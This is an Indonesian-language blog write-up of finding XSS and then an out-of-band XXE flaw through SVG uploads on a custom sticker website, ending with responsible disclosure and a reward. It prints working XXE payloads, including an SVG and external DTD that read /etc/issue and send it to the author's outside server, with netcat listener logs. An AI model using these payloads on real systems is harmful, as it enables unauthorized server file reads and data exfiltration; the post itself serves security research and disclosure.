---
layout: post
title: Bug XXE Pada Situs Custom Sticker
date: 2018-11-25 13:37:00 PM
permalink: /project/2018-11-25-bug-xxe-pada-situs-custom-sticker/
author: xhellc0de
categories: [ pentesting, xxe ]
tags: vulnerability xxe
comments: true
image: /images/xxe.jpg
---
![XXE](/images/xxe.jpg)

Beberapa waktu lalu, saya sedang mencari situs untuk membuat custom sticker. Tidak lama saya menemunkan salah satu situs, dan di situs tersebut saya dapat membuat custom sticker dengan format gambar **.svg**. Lalu saya mencoba iseng meng-upload .svg file dengan payload XSS didalamnya.
Setelah file .svg terupload, dan ternyata XSS ter-triger pada file tersebut.

![XSS Trigered](/images/xxe_api_sa.jpg)

Namun XSS tertriger pada domain api.[redacted].com, dan tidak ada cookie yang bisa diambil disitu, jadi saya pikir XSS ini pun tidak dapat meng-exploitasi user lain pada situs tersebut.

![cat /etc/sad](/images/sad.gif)

Mengingat file yang diupload adalah **.svg**, saya mencoba kemungkinan adanya kerentanan XXE pada situs tersebut. Untuk mengetesnya, saya menggunakan payload XXE sederhana seperti berikut:

```
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE gpx [<!ENTITY xxe SYSTEM "http://[redacted]:1337/ping_me" > ]>
<svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
```

Dan benar saja, ada respond pada server saya!

```
[root@illuminate ~]# nc -lv 1337

Connection from [redacted] port 1337 [tcp/menandmice-dns] accepted
GET /ping_me HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Ageng: Java/1.8.0_111
Host: [redacted]:1337
Accept: text/html, image/gif, image/jpg, *;  q=.2, */*; q=.2
Connection: keep-alive
```

![kamen](/images/kamen.gif)

Untuk melakukan _file read_ yang ada di server, saya memodifikasi sedikit payload menjadi seperti berikut:

File **.svg**
```
<?xml version="1.0" standalone="yes"?><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [ 
 <!ENTITY % file SYSTEM "file:///etc/issue">
 <!ENTITY % dtd SYSTEM "http://[redacted]/x.dtd">
%dtd;]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&send;</svg>
```

File **x.dtd**
```
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://[redacted]:1337/?%file;'>">
%all;
```

Dan respond nya seperti berikut:

```
[root@illuminate ~]# nc -lv 1337

Connection from [redacted] port 1337 [tcp/menandmice-dns] accepted
GET /?Ubuntu 14.04.5 LTS \n \1 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_111
Host: [redacted]:1337
Accept: text/html, image/gif, image/jpg, *;  q=.2, */*; q=.2
Connection: keep-alive
```

Karena memang awalnya tidak berniat mencari Bug di website ini, dan website ini pun tidak menyediakan Program Bug Bounty jadi saya tidak mengharapkan imbalan atau reward atas temuan ini. Namun tidak ada salahnya bila kita melaporkan temuan ini supaya pemilik website memiliki kesempatan untuk memperbaiki celah tersebut.

![reward](/images/sticker_email.jpg)

Beberapa hari setelah saya mengirim report, pihak website menginformasikan bahwa celah tersebut telah diperbaiki, dan mereka meng-apresiasi dengan memberi reward berupa Phone Case (salah satu produk mereka).
Hehe lumayan dapat Phone Case gratis dari luar negeri XD

